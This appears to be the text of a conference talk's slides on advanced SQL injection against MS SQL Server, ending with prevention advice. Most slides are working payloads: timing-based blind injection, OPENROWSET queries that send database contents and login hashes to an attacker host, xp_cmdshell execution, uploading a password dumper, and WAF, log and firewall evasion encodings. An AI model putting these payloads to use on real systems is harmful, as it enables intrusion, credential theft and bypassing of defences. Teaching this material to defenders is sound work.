Advanced SQLi and Evasion Techniques
About Me
IntroductionDamian Profancik | Technical Lead/Security Services Leader
@ Apparatus, [email protected]
@integrisec
CreditCesar Cerrudo – CTO, IOActive Labs
o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
ModSecurity Team – Trustwave SpiderLabso http://
blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
Avi Douglen – OWASP Board Member, Israelo http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
SQL Injection Basics• Dynamic construction of SQL queries
“SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'”
• Unsanitized user input
uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd = ' '
• Excessive permissiono Web services running as privileged user with db_owner rightso Connecting to database using sa, dbo, or sysadmin accountso Lax file system permissions
Advance SQLi Techniques• Blind SQL Injection• Data Exfiltration• Privilege Escalation• Command Execution• Uploading Files• Internal DB Server Exploration• Port Scanning• Firewall Evasion• Log Evasion• WAF Evasion
Blind SQL Injection
Blind SQL Injection• Differential Analysis
Example:
http://www.someforum.com/posts.php?id=2
SELECT author, title, body FROM posts WHERE ID = 2
http://www.someforum.com/posts.php?id=2 and 1=2
SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
http://www.someforum.com/posts.php?id=2 and 1=1
SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
Blind SQL Injection (cont.)• Database Management System Fingerprinting
o System Functions• MS SQL Server = getdate()
• MySQL = now()
• Oracle = sysdate()
• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
o String Concatenation• MS SQL Server = +
• MySQL = +, CONCAT()
• Oracle = ||, CONCAT()
• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
o Query Chaining• MS SQL Server, MySQL = allows chaining with semicolon
• Oracle = does NOT allow chaining with semicolon
• Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.)• Timing Attacks
o Adding delay• SQL Server = WAIT FOR DELAY '0:0:10‘
• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null)
• PostgreSQL = pg_sleep(10)
• Oracle = Union with query that contains a lot of results
o SELECT IF(condition, true, false)
Example:
…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
Attacking MS SQL Server
Linked and Remote Servers• OPENROWSET
Example:
SELECT * FROM OPENROWSET( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;'
'SELECT * FROM table' )
• OPENDATASOURCE
Example:
SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )
.DatabaseName.dbo.TableName
Data Exfiltration• Remote server INSERT
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM table2
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysobjects ')
SELECT * FROM databasename.dbo.sysobjects
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM databasename..table1
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table2')
SELECT * FROM databasename..table2
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
‘SELECT * FROM _sysxlogins')
SELECT * FROM databasename.dbo.sysxlogins
Privilege Escalation• Known vulnerabilities
Example:
SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
• Often not requiredo Connection strings using SA, dbo, sysadmino Web service context
Command Execution
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'
Uploading FilesOn attacker’s server…
1. CREATE TABLE AttackerTable (data text)
2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
On victim’s server…
3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'
5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
Uploading Files (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC xp_cmdshell '"first script line" >> script.vbs'
…
EXEC xp_cmdshell '"second script line" >> script.vbs'
...
EXEC xp_cmdshell '"last script line" >> script.vbs'
EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
Internal DB Server Exploration• Linked and Remote Servers
1. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM master.dbo.sysservers
2. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM linkedserver1.master.dbo.sysservers
3. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM linkedserver1.master.dbo.sysdatabases
4. Rinse and repeat…
Port Scanning
Example:
SELECT * FROM OPENROWSET('SQLOLEDB',
'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
'SELECT * FROM table')
Evasion Techniques
Firewall Evasion• Use port 80 for outbound
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
'SELECT * FROM table1')
SELECT * FROM table2
Log Evasion• Inject using POST parameters
• Long HTTP requestso IIS truncates requests longer than 4097 characterso Sun-One Application Server truncates at 4092 characters
Example:
http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
WAF Evasion• Comments
o # = single line commento -- = single line commento /* */ = inline, multi-line commento /*! */ = MySQL-specific inline, multi-line comment
Example:
http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
• New lineo %0D%0A = URL-encoded newlineo %0B = URL-encoded vertical separator
Example:
http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.)• Character Encoding
o Unicode (U+02BC = ʼ)o CHAR()o Hexadecimalo URL-encodingo Double Encoding
Example:
Double Encoding:
URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM…
Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.)• Concatenation
o EXEC()o Split/Joino Special Characters (i.e. ‘[‘, ‘+’, ‘%’, etc.)
Example:
Split/Join:
URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
WAF = id=SELECT name
id=password FROM users
ASP/ASP.Net = id=SELECT name,password FROM users
Special Characters:
URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
WAF = id=SEL%ECT name,password FR%OM users
ASP/ASP.Net = id=SELECT name,password FROM users
SQL Injection Prevention
SQLi Prevention• Sanitize User Input
o Normalize Inputo Whitelistso Built-in Functionso Regular Expressionso Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)
• Prepared Statements/Parameterized Queries• Stored Procedures• Accounts with Least Privilege• Enable DisallowAdhocAccess registry setting for MS SQL Server• Perform Self Assessments• Use a Web Application Firewall• Filter Outbound Traffic at Firewall
Q & A
Top Related